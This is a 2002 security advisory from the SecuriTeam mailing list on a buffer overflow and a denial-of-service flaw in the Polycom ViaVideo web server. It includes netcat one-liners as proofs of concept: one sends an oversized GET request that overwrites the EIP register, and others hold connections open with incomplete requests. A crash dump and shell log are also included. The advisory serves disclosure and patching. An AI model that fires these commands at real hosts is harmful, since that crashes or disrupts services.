[NT] Security Vulnerabilities in Polycom ViaVideo Web Component

From: support@securiteam.com
Date: 10/15/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 15 Oct 2002 04:41:37 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Security Vulnerabilities in Polycom ViaVideo Web Component
------------------------------------------------------------------------

SUMMARY

The Polycom Webserver is a component of 'ViaVideo', two security
vulnerabilities have been found in the product, one allows executing of
arbitrary code, the other causes the product to crash.

DETAILS

Vulnerable systems:
 * Polycom ViaVideo version 2.2
 * Polycom ViaVideo version 3.0

Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component
A buffer overflow in the way the server handles incoming GET requests
allows attackers to overwrite the EIP register, effectively controlling
the code execution process.

Proof of Concept:
perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat
10.1.0.1 3603

Error displayed on host:
OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195
Version: Release 3.0 26Feb2002 3.0.0.144
ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at
001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s),
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line
1092+0002 byte(s)
EAX=41414141 EBX=03D491C4 ECX=03D49190 EDX=00000001 ESI=03D49190
EDI=03D4A1E8 EBP=03B6D3F4 ESP=0586FF1C EIP=67302ECE FLG=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000
001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll,
CHttpSocket::ReadHeader()+0226 byte(s),
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line
1092+0002 byte(s)

Problem #2: Denial-of-Service Vulnerability
By creating the following sequence is possible to cause the CPU time
utilized by the product to reach 99%.

Proof of Concept:
 - Open up several (4) connections to the webserver port (3603).
 - Send any incomplete HTTP request.
 - Leave these connections open at this point.
 - Normal requests to the webserver will now fail.
 - CPU utilization on remote host (Win2k) goes to 99% for ViaVideo.exe

[jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' |
netcat 10.1.3.54 3603 &
[5] 2140
[jonny@loki 15:22:14 ~]$
[jonny@loki 15:22:14 ~]$ jobs
[1] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat
10.1.3.54 3603 &
[2] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat
10.1.3.54 3603 &
[3] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat
10.1.3.54 3603 &
[4]- Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat
10.1.3.54 3603 &
[5]+ Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat
10.1.3.54 3603 &
[jonny@loki 15:22:39 ~]$

Solution:
A patch has been supplied by Polycom and can be downloaded at:
<http://www.polycom.com/securitycenter>
http://www.polycom.com/securitycenter

ADDITIONAL INFORMATION

The information has been provided by <mailto:advisory@prophecy.net.nz>
advisory@prophecy.net.nz.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages